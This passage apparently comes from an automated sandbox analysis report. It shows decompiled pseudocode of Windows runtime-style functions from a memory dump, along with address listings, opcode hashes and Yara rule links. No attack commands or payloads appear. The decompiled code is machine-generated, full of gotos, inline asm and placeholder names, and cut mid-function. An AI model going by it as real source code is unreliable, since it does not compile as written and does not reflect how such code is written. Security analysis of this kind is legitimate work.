							E0166FFB0(_t42, _t53, 0x1748608);
							if(_t53 != 0) {
								L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0166FFB0(_t41, _t51, 0x1748608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                      0x01694a2c
                                                      0x01694a34
                                                      0x01694a3c
                                                      0x01694a3e
                                                      0x01694a48
                                                      0x01694a4b
                                                      0x01694a4d
                                                      0x01694a51
                                                      0x01694a9c
                                                      0x00000000
                                                      0x00000000
                                                      0x01694aa3
                                                      0x01694aa8
                                                      0x01694aad
                                                      0x01694ab1
                                                      0x01694ade
                                                      0x01694ae3
                                                      0x01694a5a
                                                      0x01694a62
                                                      0x01694a6a
                                                      0x01694a6e
                                                      0x016cf203
                                                      0x01694a84
                                                      0x01694a88
                                                      0x01694a89
                                                      0x01694a8a
                                                      0x01694a95
                                                      0x01694a95
                                                      0x01694a79
                                                      0x01694a80
                                                      0x01694af2
                                                      0x01694af4
                                                      0x01694af9
                                                      0x01694aff
                                                      0x01694b01
                                                      0x01694b03
                                                      0x01694b08
                                                      0x016cf20a
                                                      0x016cf212
                                                      0x016cf216
                                                      0x016cf216
                                                      0x01694b08
                                                      0x01694b13
                                                      0x01694b1a
                                                      0x016cf229
                                                      0x016cf229
                                                      0x01694b1a
                                                      0x01694a82
                                                      0x00000000
                                                      0x01694a82
                                                      0x01694ab7
                                                      0x01694acd
                                                      0x01694acd
                                                      0x01694ad5
                                                      0x01694ada
                                                      0x00000000
                                                      0x01694ada
                                                      0x01694ac2
                                                      0x01694acb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01694acb
                                                      0x01694a53
                                                      0x01694a53
                                                      0x01694a58
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b5adce9b735d60737fb4c0ac47e0f1effadadb77eb890a43eb853f98ba1ea90
                                                      • Instruction ID: 19c0cb59805c94ccde952a3505b0bf96e8001cdb955826cb9da53f2bf4a09167
                                                      • Opcode Fuzzy Hash: 1b5adce9b735d60737fb4c0ac47e0f1effadadb77eb890a43eb853f98ba1ea90
                                                      • Instruction Fuzzy Hash: 3C31E432205251DBCB21DF98CE54B2AFBAAFF81B10F01455DE86647345CBB4D802CB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01698EC7, Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E01698EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x174d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01684E70(0x17486e4, 0x1699490, 0, 0);
					if( *0x17453e8 > 5 && E01698F33(0x17453e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x17453e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x17453e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x163bc46;
						_t48 = E016D7B9C(0x17453e8, 0x163bc46, _t67, 0x17453e8, _t70,  &_v140);
					}
				}
				return E0169B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                      0x01698ec7
                                                      0x01698ed9
                                                      0x01698edc
                                                      0x01698ee6
                                                      0x01698ee9
                                                      0x01698eee
                                                      0x01698efc
                                                      0x01698f08
                                                      0x016d1349
                                                      0x016d1353
                                                      0x016d135d
                                                      0x016d1366
                                                      0x016d136f
                                                      0x016d1375
                                                      0x016d137c
                                                      0x016d1385
                                                      0x016d1390
                                                      0x016d1391
                                                      0x016d139c
                                                      0x016d139d
                                                      0x016d13a6
                                                      0x016d13ac
                                                      0x016d13b2
                                                      0x016d13b5
                                                      0x016d13bc
                                                      0x016d13bf
                                                      0x016d13c2
                                                      0x016d13c5
                                                      0x016d13c8
                                                      0x016d13cb
                                                      0x016d13ce
                                                      0x016d13d1
                                                      0x016d13d4
                                                      0x016d13d7
                                                      0x016d13da
                                                      0x016d13dd
                                                      0x016d13e0
                                                      0x016d13e3
                                                      0x016d13e6
                                                      0x016d13e9
                                                      0x016d13f6
                                                      0x016d1400
                                                      0x016d1400
                                                      0x01698f08
                                                      0x01698f32

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84ad4ebb752675d1de472d0cc33c4614753f276b0a6ec833e412b464b3088f38
                                                      • Instruction ID: c56c0f64cfb9d1b93ba0b2339edcad344e9dcadb0d75e355d8e151026525dfe8
                                                      • Opcode Fuzzy Hash: 84ad4ebb752675d1de472d0cc33c4614753f276b0a6ec833e412b464b3088f38
                                                      • Instruction Fuzzy Hash: 3841A1B1D0021C9FDB20CFAAD980AADFBF9FB48710F5041AEE509A7240E7745A45CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168E730, Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E0168E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01699670() < 0) {
					L016ADF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1747b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01674620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0168E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                      0x0168e730
                                                      0x0168e736
                                                      0x0168e738
                                                      0x0168e73d
                                                      0x0168e73e
                                                      0x0168e740
                                                      0x0168e749
                                                      0x0168e765
                                                      0x0168e76a
                                                      0x0168e76b
                                                      0x0168e76c
                                                      0x0168e76d
                                                      0x0168e76e
                                                      0x0168e76f
                                                      0x0168e775
                                                      0x0168e777
                                                      0x0168e77e
                                                      0x016cb675
                                                      0x0168e784
                                                      0x0168e784
                                                      0x0168e789
                                                      0x0168e7a8
                                                      0x0168e7ac
                                                      0x0168e807
                                                      0x0168e7ae
                                                      0x0168e7ae
                                                      0x0168e7b1
                                                      0x0168e7b4
                                                      0x0168e7b9
                                                      0x0168e7c0
                                                      0x0168e7c4
                                                      0x0168e7ca
                                                      0x0168e7cc
                                                      0x00000000
                                                      0x0168e7d3
                                                      0x0168e7d6
                                                      0x00000000
                                                      0x00000000
                                                      0x0168e7ff
                                                      0x0168e802
                                                      0x00000000
                                                      0x00000000
                                                      0x0168e7f9
                                                      0x0168e7fc
                                                      0x00000000
                                                      0x00000000
                                                      0x0168e7f3
                                                      0x0168e7f6
                                                      0x00000000
                                                      0x00000000
                                                      0x0168e7ed
                                                      0x0168e7f0
                                                      0x00000000
                                                      0x00000000
                                                      0x0168e7e7
                                                      0x0168e7ea
                                                      0x00000000
                                                      0x00000000
                                                      0x016cb685
                                                      0x016cb688
                                                      0x00000000
                                                      0x00000000
                                                      0x016cb682
                                                      0x00000000
                                                      0x00000000
                                                      0x0168e7cc
                                                      0x0168e7d9
                                                      0x0168e7dc
                                                      0x0168e7de
                                                      0x0168e7de
                                                      0x0168e7ac
                                                      0x0168e7e4
                                                      0x0168e74b
                                                      0x0168e751
                                                      0x0168e759
                                                      0x0168e761
                                                      0x0168e761

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b3b8d4fe95a96b36990f2affc96ebf9a3a6a5d5b96a6d8ce9cdb08f7b19d61e
                                                      • Instruction ID: c0f4534f72f917156241a7f0b1dde0f1f60267d63d44c473321bfb13b688e234
                                                      • Opcode Fuzzy Hash: 0b3b8d4fe95a96b36990f2affc96ebf9a3a6a5d5b96a6d8ce9cdb08f7b19d61e
                                                      • Instruction Fuzzy Hash: 4C315CB5A14249EFD744DF58D841B9ABBE8FB09314F14825AFA14CB341D732ED90CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168BC2C, Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E0168BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1746100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01672280(0xd, 0x745f1a0);
				_t41 =  *0x17460f8; // 0x0
				if(_t41 != 0) {
					 *0x17460f8 =  *_t41;
					 *0x17460fc =  *0x17460fc + 0xffff;
				}
				E0166FFB0(_t41, 0x800, 0x745f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x17460f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01674620(0x1746100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1746100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                      0x0168bc36
                                                      0x0168bc42
                                                      0x0168bc45
                                                      0x0168bc4a
                                                      0x0168bd35
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0168bc50
                                                      0x0168bc50
                                                      0x0168bc58
                                                      0x0168bc5a
                                                      0x0168bc60
                                                      0x00000000
                                                      0x00000000
                                                      0x016ca4f2
                                                      0x016ca4f6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016ca4fc
                                                      0x0168bc79
                                                      0x0168bc7e
                                                      0x0168bc86
                                                      0x0168bd16
                                                      0x0168bd20
                                                      0x0168bd20
                                                      0x0168bc8d
                                                      0x0168bc94
                                                      0x0168bcbd
                                                      0x0168bcca
                                                      0x0168bccb
                                                      0x0168bccc
                                                      0x0168bccd
                                                      0x0168bcce
                                                      0x0168bcd4
                                                      0x0168bcea
                                                      0x0168bcee
                                                      0x0168bcf2
                                                      0x0168bd00
                                                      0x0168bd04
                                                      0x00000000
                                                      0x0168bc96
                                                      0x0168bcab
                                                      0x0168bcaf
                                                      0x0168bd2c
                                                      0x0168bd2c
                                                      0x0168bd09
                                                      0x00000000
                                                      0x0168bd09
                                                      0x0168bcb1
                                                      0x0168bcb5
                                                      0x0168bcbb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0168bcbb

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 669e3d1bbb40ef07b1f5e1522d1e049f3cbabc60f0e63b0a2e161b48e48eb6e8
                                                      • Instruction ID: 4946bdd9ca0c4af802fd44d0e0b39b6eb73d63e867783972ef7e1bf9277c74a7
                                                      • Opcode Fuzzy Hash: 669e3d1bbb40ef07b1f5e1522d1e049f3cbabc60f0e63b0a2e161b48e48eb6e8
                                                      • Instruction Fuzzy Hash: EF31D276600616EBCB21EF58D8C0BA677B4FF19321F148279ED44DB306EB74D9468B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01659100, Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E01659100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x172f6e8);
				E016AD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E017288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E016AD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x17486c0; // 0x12007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x17486b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01672280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E017288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0169AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x174b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x17484c0;
										if(_t69 >=  *0x17484c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01729063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0165922A(_t82);
							_t53 = E01677D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01728B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x17486c0; // 0x12007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x17486b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x17486bc;
										_t72 = 0x17486b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01659240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x17486c4;
									_t72 = 0x17486c0;
									L18:
									E01689B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                      0x01659100
                                                      0x01659100
                                                      0x01659100
                                                      0x01659100
                                                      0x01659102
                                                      0x01659107
                                                      0x0165910c
                                                      0x01659110
                                                      0x01659115
                                                      0x01659136
                                                      0x01659143
                                                      0x016b37e4
                                                      0x016b37e4
                                                      0x01659149
                                                      0x0165914e
                                                      0x0165914e
                                                      0x01659117
                                                      0x0165911d
                                                      0x00000000
                                                      0x00000000
                                                      0x0165911f
                                                      0x01659125
                                                      0x00000000
                                                      0x01659151
                                                      0x01659158
                                                      0x0165915d
                                                      0x01659161
                                                      0x01659168
                                                      0x016b3715
                                                      0x00000000
                                                      0x0165916e
                                                      0x0165916e
                                                      0x01659175
                                                      0x01659177
                                                      0x0165917e
                                                      0x0165917f
                                                      0x01659182
                                                      0x01659182
                                                      0x01659187
                                                      0x01659187
                                                      0x0165918a
                                                      0x0165918d
                                                      0x0165918f
                                                      0x01659192
                                                      0x01659195
                                                      0x01659198
                                                      0x01659198
                                                      0x01659198
                                                      0x0165919a
                                                      0x00000000
                                                      0x00000000
                                                      0x016b371f
                                                      0x016b3721
                                                      0x016b3727
                                                      0x016b372f
                                                      0x016b3733
                                                      0x016b3735
                                                      0x016b3738
                                                      0x016b373b
                                                      0x016b373d
                                                      0x016b3740
                                                      0x00000000
                                                      0x00000000
                                                      0x016b3746
                                                      0x016b3749
                                                      0x00000000
                                                      0x00000000
                                                      0x016b374f
                                                      0x016b3751
                                                      0x00000000
                                                      0x00000000
                                                      0x016b3757
                                                      0x016b3759
                                                      0x016b375c
                                                      0x016b375c
                                                      0x016b375e
                                                      0x016b375e
                                                      0x016b3761
                                                      0x016b3764
                                                      0x00000000
                                                      0x00000000
                                                      0x016b3766
                                                      0x016b3768
                                                      0x016b37a3
                                                      0x016b37a3
                                                      0x016b37a5
                                                      0x016b37a7
                                                      0x016b37ad
                                                      0x016b37b0
                                                      0x016b37b2
                                                      0x016b37bc
                                                      0x016b37c2
                                                      0x016b37c2
                                                      0x016b37b2
                                                      0x01659187
                                                      0x01659187
                                                      0x0165918a
                                                      0x0165918d
                                                      0x0165918f
                                                      0x01659192
                                                      0x01659195
                                                      0x00000000
                                                      0x01659195
                                                      0x00000000
                                                      0x01659187
                                                      0x016b376a
                                                      0x016b376a
                                                      0x016b376c
                                                      0x016b376c
                                                      0x016b376f
                                                      0x016b3775
                                                      0x00000000
                                                      0x00000000
                                                      0x016b3777
                                                      0x016b3779
                                                      0x00000000
                                                      0x00000000
                                                      0x016b3782
                                                      0x016b3787
                                                      0x016b3789
                                                      0x016b3790
                                                      0x016b3790
                                                      0x016b378b
                                                      0x016b378b
                                                      0x016b378b
                                                      0x016b3792
                                                      0x016b3795
                                                      0x016b3795
                                                      0x016b3798
                                                      0x016b3798
                                                      0x016b379b
                                                      0x016b379b
                                                      0x016591a3
                                                      0x016591a9
                                                      0x016591b0
                                                      0x016591b4
                                                      0x016591b4
                                                      0x016591bb
                                                      0x016591c0
                                                      0x016591c5
                                                      0x016591c7
                                                      0x016b37da
                                                      0x016591cd
                                                      0x016591cd
                                                      0x016591cd
                                                      0x016591d2
                                                      0x016591d5
                                                      0x01659239
                                                      0x01659239
                                                      0x016591d7
                                                      0x016591db
                                                      0x016591e1
                                                      0x016591e7
                                                      0x016591fd
                                                      0x01659203
                                                      0x0165921e
                                                      0x01659223
                                                      0x00000000
                                                      0x01659223
                                                      0x01659205
                                                      0x01659208
                                                      0x0165920c
                                                      0x01659214
                                                      0x01659214
                                                      0x016591e9
                                                      0x016591e9
                                                      0x016591ee
                                                      0x016591f3
                                                      0x016591f3
                                                      0x016591f3
                                                      0x016591e7
                                                      0x00000000
                                                      0x016591db
                                                      0x01659187
                                                      0x01659168

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adde621d11e82814be8dc042bb7ec8d4557ae340eebe780d4c06c3a6b46b4237
                                                      • Instruction ID: 01056eefd1f5e2823f7e4396cb5745f6dc2949c4c6b66267bb16d6e8f2bfcece
                                                      • Opcode Fuzzy Hash: adde621d11e82814be8dc042bb7ec8d4557ae340eebe780d4c06c3a6b46b4237
                                                      • Instruction Fuzzy Hash: BC31D475A00265DFDBB5DFACC888BACBBF1BB58358F18815DC80467342C335A980CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01681DB5, Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E01681DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0167F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01674620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0167F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                      0x01681dc2
                                                      0x01681dc5
                                                      0x01681dc7
                                                      0x01681dcc
                                                      0x01681dce
                                                      0x01681dd6
                                                      0x01681ddf
                                                      0x01681de0
                                                      0x01681de1
                                                      0x01681de5
                                                      0x01681de8
                                                      0x01681def
                                                      0x01681df0
                                                      0x01681df6
                                                      0x01681df7
                                                      0x01681dfe
                                                      0x01681e1a
                                                      0x00000000
                                                      0x00000000
                                                      0x01681e0b
                                                      0x01681e12
                                                      0x01681e12
                                                      0x01681e00
                                                      0x01681e00
                                                      0x01681e05
                                                      0x01681e1e
                                                      0x01681e23
                                                      0x016c570f
                                                      0x016c5713
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5719
                                                      0x016c5719
                                                      0x01681e2c
                                                      0x01681e2d
                                                      0x01681e2e
                                                      0x01681e2f
                                                      0x01681e31
                                                      0x01681e32
                                                      0x01681e35
                                                      0x01681e3d
                                                      0x016c5723
                                                      0x016c573d
                                                      0x016c573d
                                                      0x00000000
                                                      0x016c5723
                                                      0x01681e49
                                                      0x01681e4e
                                                      0x01681e4e
                                                      0x01681e09
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                      • Instruction ID: 6acd779f82162b4dd303e44a1419ee78d551c75c44a90828c91a353c5f5e9661
                                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
